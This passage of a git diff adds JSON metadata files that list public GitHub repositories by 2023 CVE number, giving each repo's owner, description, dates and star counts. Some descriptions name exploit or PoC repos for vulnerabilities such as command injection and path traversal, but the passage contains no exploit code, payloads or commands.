"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 641369164, + "name": "CVE-2023-0386", + "full_name": "sxlmnwb\/CVE-2023-0386", + "owner": { + "login": "sxlmnwb", + "id": 65052912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65052912?v=4", + "html_url": "https:\/\/github.com\/sxlmnwb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxlmnwb\/CVE-2023-0386", + "description": "Vulnerabilities Exploitation On Ubuntu 22.04", + "fork": false, + "created_at": "2023-05-16T10:26:10Z", + "updated_at": "2024-12-23T12:37:30Z", + "pushed_at": "2023-05-16T10:49:19Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-0386" + ], + "visibility": "public", + "forks": 2, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 659614929, + "name": "CVE-2023-0386", + "full_name": "Fanxiaoyao66\/CVE-2023-0386", + "owner": { + "login": "Fanxiaoyao66", + "id": 104337898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104337898?v=4", + "html_url": "https:\/\/github.com\/Fanxiaoyao66", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fanxiaoyao66\/CVE-2023-0386", + "description": "非常简单的CVE-2023-0386's exp and analysis.Use c and sh.", + "fork": false, + "created_at": "2023-06-28T07:49:52Z", + "updated_at": "2025-01-05T04:22:31Z", + "pushed_at": "2023-06-28T07:55:23Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735013638, + "name": "CVE-2023-0386", + "full_name": "puckiestyle\/CVE-2023-0386", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2023-12-23T11:01:55Z", + "updated_at": "2024-07-25T08:49:58Z", + "pushed_at": "2023-12-23T11:12:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765025096, + "name": "CVE-2023-0386", + "full_name": "letsr00t\/CVE-2023-0386", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2024-02-29T06:22:50Z", + "updated_at": "2024-02-29T06:22:51Z", + "pushed_at": "2024-02-29T06:23:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 782345345, + "name": "CVE-2023-0386", + "full_name": "churamanib\/CVE-2023-0386", + "owner": { + "login": "churamanib", + "id": 155580704, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155580704?v=4", + "html_url": "https:\/\/github.com\/churamanib", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/churamanib\/CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2024-04-05T05:47:00Z", + "updated_at": "2024-04-05T05:49:33Z", + "pushed_at": "2024-04-05T06:01:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790464197, + "name": "CVE-2023-0386-libs", + "full_name": "EstamelGG\/CVE-2023-0386-libs", + "owner": { + "login": "EstamelGG", + "id": 46676047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46676047?v=4", + "html_url": "https:\/\/github.com\/EstamelGG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EstamelGG\/CVE-2023-0386-libs", + "description": "CVE-2023-0386 包含所需运行库", + "fork": false, + "created_at": "2024-04-22T23:33:35Z", + "updated_at": "2024-04-23T12:53:20Z", + "pushed_at": "2024-04-23T12:53:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0400.json b/2023/CVE-2023-0400.json new file mode 100644 index 0000000000..77cc4fe2bc --- /dev/null +++ b/2023/CVE-2023-0400.json @@ -0,0 +1,33 @@ +[ + { + "id": 833053713, + "name": "CVE-2023-0400", + "full_name": "pinpinsec\/CVE-2023-0400", + "owner": { + "login": "pinpinsec", + "id": 94911442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94911442?v=4", + "html_url": "https:\/\/github.com\/pinpinsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pinpinsec\/CVE-2023-0400", + "description": "trellix DLP Bypass", + "fork": false, + "created_at": "2024-07-24T09:04:55Z", + "updated_at": "2024-07-24T09:22:49Z", + "pushed_at": "2024-07-24T09:22:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0461.json b/2023/CVE-2023-0461.json new file mode 100644 index 0000000000..56dfec4d11 --- /dev/null +++ b/2023/CVE-2023-0461.json @@ -0,0 +1,33 @@ +[ + { + "id": 638224867, + "name": "kernel_v4.19.72_CVE-2023-0461", + "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2023-0461", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2023-0461", + "description": null, + "fork": false, + "created_at": "2023-05-09T10:44:10Z", + "updated_at": "2023-05-09T10:55:14Z", + "pushed_at": "2023-05-09T12:34:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0464.json b/2023/CVE-2023-0464.json new file mode 100644 index 0000000000..9cea4d5e0e --- /dev/null +++ b/2023/CVE-2023-0464.json @@ -0,0 +1,33 @@ +[ + { + "id": 631830330, + "name": "Openssl_1.1.1g_CVE-2023-0464", + "full_name": "Trinadh465\/Openssl_1.1.1g_CVE-2023-0464", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/Openssl_1.1.1g_CVE-2023-0464", + "description": null, + "fork": false, + "created_at": "2023-04-24T06:40:37Z", + "updated_at": "2023-04-24T06:43:56Z", + "pushed_at": "2023-04-24T06:44:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0630.json b/2023/CVE-2023-0630.json new file mode 100644 index 0000000000..610497ca7e --- /dev/null +++ b/2023/CVE-2023-0630.json @@ -0,0 +1,38 @@ +[ + { + "id": 651513086, + "name": "CVE-2023-0630", + "full_name": "RandomRobbieBF\/CVE-2023-0630", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-0630", + "description": "CVE-2023-0630 - Slimstat Analytics < 4.9.3.3 - Subscriber+ SQL Injection", + "fork": false, + "created_at": "2023-06-09T12:02:55Z", + "updated_at": "2023-06-25T00:31:23Z", + "pushed_at": "2023-06-12T10:57:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-0630", + "exploit", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0656.json b/2023/CVE-2023-0656.json new file mode 100644 index 0000000000..94f55c95e4 --- /dev/null +++ b/2023/CVE-2023-0656.json @@ -0,0 +1,33 @@ +[ + { + "id": 742585090, + "name": "CVE-2022-22274_CVE-2023-0656", + "full_name": "BishopFox\/CVE-2022-22274_CVE-2023-0656", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/CVE-2022-22274_CVE-2023-0656", + "description": null, + "fork": false, + "created_at": "2024-01-12T20:03:51Z", + "updated_at": "2024-11-28T00:21:37Z", + "pushed_at": "2024-01-12T20:15:47Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0669.json b/2023/CVE-2023-0669.json new file mode 100644 index 0000000000..c5c2d538b7 --- /dev/null +++ b/2023/CVE-2023-0669.json @@ -0,0 +1,161 @@ +[ + { + "id": 600041726, + "name": "CVE-2023-0669", + "full_name": "0xf4n9x\/CVE-2023-0669", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2023-0669", + "description": "CVE-2023-0669 GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.", + "fork": false, + "created_at": "2023-02-10T13:02:55Z", + "updated_at": "2024-08-12T20:29:46Z", + "pushed_at": "2024-04-16T09:20:45Z", + "stargazers_count": 100, + "watchers_count": 100, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 100, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 602298086, + "name": "CVE-2023-0669", + "full_name": "cataliniovita\/CVE-2023-0669", + "owner": { + "login": "cataliniovita", + "id": 60446603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60446603?v=4", + "html_url": "https:\/\/github.com\/cataliniovita", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cataliniovita\/CVE-2023-0669", + "description": "CVE-2023-0669 GoAnywhere MFT command injection vulnerability", + "fork": false, + "created_at": "2023-02-15T23:00:18Z", + "updated_at": "2023-02-15T23:00:18Z", + "pushed_at": "2023-02-15T23:00:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604487308, + "name": "CVE-2023-0669", + "full_name": "Griffin-01\/CVE-2023-0669", + "owner": { + "login": "Griffin-01", + "id": 59146115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59146115?v=4", + "html_url": "https:\/\/github.com\/Griffin-01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Griffin-01\/CVE-2023-0669", + "description": null, + "fork": false, + "created_at": "2023-02-21T06:52:28Z", + "updated_at": "2023-02-21T06:52:28Z", + "pushed_at": "2023-02-21T06:52:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 606615026, + "name": "CVE-2023-0669-Analysis", + "full_name": "yosef0x01\/CVE-2023-0669-Analysis", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2023-0669-Analysis", + "description": "CVE analysis for CVE-2023-0669", + "fork": false, + "created_at": "2023-02-26T02:33:54Z", + "updated_at": "2024-08-12T20:29:58Z", + "pushed_at": "2023-03-12T17:37:44Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624244077, + "name": "CVE-2023-0669", + "full_name": "Avento\/CVE-2023-0669", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2023-0669", + "description": "GoAnywhere MFT CVE-2023-0669 LicenseResponseServlet Deserialization Vulnerabilities Python RCE PoC(Proof of Concept)", + "fork": false, + "created_at": "2023-04-06T03:40:03Z", + "updated_at": "2024-04-19T22:37:59Z", + "pushed_at": "2023-07-07T10:42:46Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-0669", + "deserialization-vulnerabilities", + "licenseresponseservlet" + ], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0748.json b/2023/CVE-2023-0748.json new file mode 100644 index 0000000000..ff72f8c653 --- /dev/null +++ b/2023/CVE-2023-0748.json @@ -0,0 +1,33 @@ +[ + { + "id": 600124909, + "name": "CVE-2023-0748", + "full_name": "gonzxph\/CVE-2023-0748", + "owner": { + "login": "gonzxph", + "id": 58154356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58154356?v=4", + "html_url": "https:\/\/github.com\/gonzxph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gonzxph\/CVE-2023-0748", + "description": "BTCPayServer version 1.7.5 and below is vulnerable for Open Redirection attack.", + "fork": false, + "created_at": "2023-02-10T16:32:48Z", + "updated_at": "2023-02-10T16:46:58Z", + "pushed_at": "2023-02-11T02:22:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-08.json b/2023/CVE-2023-08.json new file mode 100644 index 0000000000..b95a36728a --- /dev/null +++ b/2023/CVE-2023-08.json @@ -0,0 +1,33 @@ +[ + { + "id": 690906596, + "name": "CVE-2023-08-21-exploit", + "full_name": "amirzargham\/CVE-2023-08-21-exploit", + "owner": { + "login": "amirzargham", + "id": 133110721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133110721?v=4", + "html_url": "https:\/\/github.com\/amirzargham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amirzargham\/CVE-2023-08-21-exploit", + "description": "Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS", + "fork": false, + "created_at": "2023-09-13T05:59:02Z", + "updated_at": "2023-09-24T07:34:00Z", + "pushed_at": "2024-02-10T05:04:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0830.json b/2023/CVE-2023-0830.json new file mode 100644 index 0000000000..33822506ff --- /dev/null +++ b/2023/CVE-2023-0830.json @@ -0,0 +1,33 @@ +[ + { + "id": 660251840, + "name": "CVE-2023-0830", + "full_name": "xbz0n\/CVE-2023-0830", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2023-0830", + "description": "Exploit for EasyNAS version 1.1.0. The vulnerability exploited is a command injection flaw, which requires authentication.", + "fork": false, + "created_at": "2023-06-29T15:23:06Z", + "updated_at": "2024-06-04T10:48:14Z", + "pushed_at": "2023-06-29T15:29:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0860.json b/2023/CVE-2023-0860.json new file mode 100644 index 0000000000..fa39424667 --- /dev/null +++ b/2023/CVE-2023-0860.json @@ -0,0 +1,33 @@ +[ + { + "id": 602570539, + "name": "CVE-2023-0860", + "full_name": "0xsu3ks\/CVE-2023-0860", + "owner": { + "login": "0xsu3ks", + "id": 97468816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97468816?v=4", + "html_url": "https:\/\/github.com\/0xsu3ks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xsu3ks\/CVE-2023-0860", + "description": null, + "fork": false, + "created_at": "2023-02-16T13:49:20Z", + "updated_at": "2023-02-16T13:49:20Z", + "pushed_at": "2023-02-16T13:55:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0861.json b/2023/CVE-2023-0861.json new file mode 100644 index 0000000000..ed661d6fea --- /dev/null +++ b/2023/CVE-2023-0861.json @@ -0,0 +1,33 @@ +[ + { + "id": 613034339, + "name": "CVE-2023-0861-POC", + "full_name": "seifallahhomrani1\/CVE-2023-0861-POC", + "owner": { + "login": "seifallahhomrani1", + "id": 29190315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29190315?v=4", + "html_url": "https:\/\/github.com\/seifallahhomrani1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/seifallahhomrani1\/CVE-2023-0861-POC", + "description": "Analyzing and Reproducing the Command Injection Vulnerability (CVE-2023-0861) in NetModule Routers", + "fork": false, + "created_at": "2023-03-12T17:43:00Z", + "updated_at": "2024-09-19T13:58:55Z", + "pushed_at": "2023-03-16T19:17:47Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1112.json b/2023/CVE-2023-1112.json new file mode 100644 index 0000000000..fce55b885d --- /dev/null +++ b/2023/CVE-2023-1112.json @@ -0,0 +1,33 @@ +[ + { + "id": 597274682, + "name": "Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal", + "full_name": "Nickguitar\/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal", + "owner": { + "login": "Nickguitar", + "id": 3837916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3837916?v=4", + "html_url": "https:\/\/github.com\/Nickguitar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nickguitar\/Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal", + "description": "Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 Path Traversal (CVE-2023-1112)", + "fork": false, + "created_at": "2023-02-04T03:03:05Z", + "updated_at": "2024-11-12T11:51:38Z", + "pushed_at": "2023-03-07T01:31:57Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1177.json b/2023/CVE-2023-1177.json new file mode 100644 index 0000000000..26742ee828 --- /dev/null +++ b/2023/CVE-2023-1177.json @@ -0,0 +1,163 @@ +[ + { + "id": 627221018, + "name": "ml-CVE-2023-1177", + "full_name": "hh-hunter\/ml-CVE-2023-1177", + "owner": { + "login": "hh-hunter", + "id": 91593280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4", + "html_url": "https:\/\/github.com\/hh-hunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hh-hunter\/ml-CVE-2023-1177", + "description": null, + "fork": false, + "created_at": "2023-04-13T02:56:24Z", + "updated_at": "2023-04-13T02:56:31Z", + "pushed_at": "2024-01-10T01:25:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 669753010, + "name": "CVE-2023-1177-MLFlow", + "full_name": "iumiro\/CVE-2023-1177-MLFlow", + "owner": { + "login": "iumiro", + "id": 100076479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100076479?v=4", + "html_url": "https:\/\/github.com\/iumiro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iumiro\/CVE-2023-1177-MLFlow", + "description": "CVE for 2023", + "fork": false, + "created_at": "2023-07-23T10:12:27Z", + "updated_at": "2023-08-03T10:17:43Z", + "pushed_at": "2023-08-03T10:10:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721284951, + "name": "CVE-2023-1177-rebuild", + "full_name": "SpycioKon\/CVE-2023-1177-rebuild", + "owner": { + "login": "SpycioKon", + "id": 77606941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77606941?v=4", + "html_url": "https:\/\/github.com\/SpycioKon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpycioKon\/CVE-2023-1177-rebuild", + "description": "Learn more things, not suck all things", + "fork": false, + "created_at": "2023-11-20T18:32:46Z", + "updated_at": "2023-11-20T18:37:25Z", + "pushed_at": "2023-11-20T18:36:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845632603, + "name": "MLflow-Vuln", + "full_name": "saimahmed\/MLflow-Vuln", + "owner": { + "login": "saimahmed", + "id": 25364793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25364793?v=4", + "html_url": "https:\/\/github.com\/saimahmed", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/saimahmed\/MLflow-Vuln", + "description": "MLflow LFI\/RFI Vulnerability -CVE-2023-1177 - Reproduced", + "fork": false, + "created_at": "2024-08-21T16:11:31Z", + "updated_at": "2024-09-01T03:56:50Z", + "pushed_at": "2024-09-01T03:56:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 859830353, + "name": "CVE-2023-1177", + "full_name": "charlesgargasson\/CVE-2023-1177", + "owner": { + "login": "charlesgargasson", + "id": 26895987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895987?v=4", + "html_url": "https:\/\/github.com\/charlesgargasson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesgargasson\/CVE-2023-1177", + "description": "MLFlow Path Traversal", + "fork": false, + "created_at": "2024-09-19T10:59:31Z", + "updated_at": "2024-09-19T11:04:13Z", + "pushed_at": "2024-09-19T11:02:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-1177", + "exploit", + "mlflow", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-1326.json b/2023/CVE-2023-1326.json new file mode 100644 index 0000000000..b7ce04a756 --- /dev/null +++ b/2023/CVE-2023-1326.json @@ -0,0 +1,126 @@ +[ + { + "id": 727965226, + "name": "CVE-2023-1326-PoC", + "full_name": "diego-tella\/CVE-2023-1326-PoC", + "owner": { + "login": "diego-tella", + "id": 70545257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70545257?v=4", + "html_url": "https:\/\/github.com\/diego-tella", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diego-tella\/CVE-2023-1326-PoC", + "description": "A proof of concept for CVE-2023–1326 in apport-cli 2.26.0", + "fork": false, + "created_at": "2023-12-06T00:07:40Z", + "updated_at": "2024-11-19T15:40:00Z", + "pushed_at": "2023-12-06T12:46:08Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 743946606, + "name": "CVE-2023-1326", + "full_name": "Pol-Ruiz\/CVE-2023-1326", + "owner": { + "login": "Pol-Ruiz", + "id": 151052652, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151052652?v=4", + "html_url": "https:\/\/github.com\/Pol-Ruiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pol-Ruiz\/CVE-2023-1326", + "description": "Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2023-1326", + "fork": false, + "created_at": "2024-01-16T10:20:53Z", + "updated_at": "2024-01-16T10:20:53Z", + "pushed_at": "2024-01-26T13:55:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796053569, + "name": "CVE-2023-1326", + "full_name": "n3rdh4x0r\/CVE-2023-1326", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2023-1326", + "description": null, + "fork": false, + "created_at": "2024-05-04T19:47:58Z", + "updated_at": "2024-05-05T02:19:49Z", + "pushed_at": "2024-05-04T19:56:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815018186, + "name": "CVE-2023-1326-PoC", + "full_name": "cve-2024\/CVE-2023-1326-PoC", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": 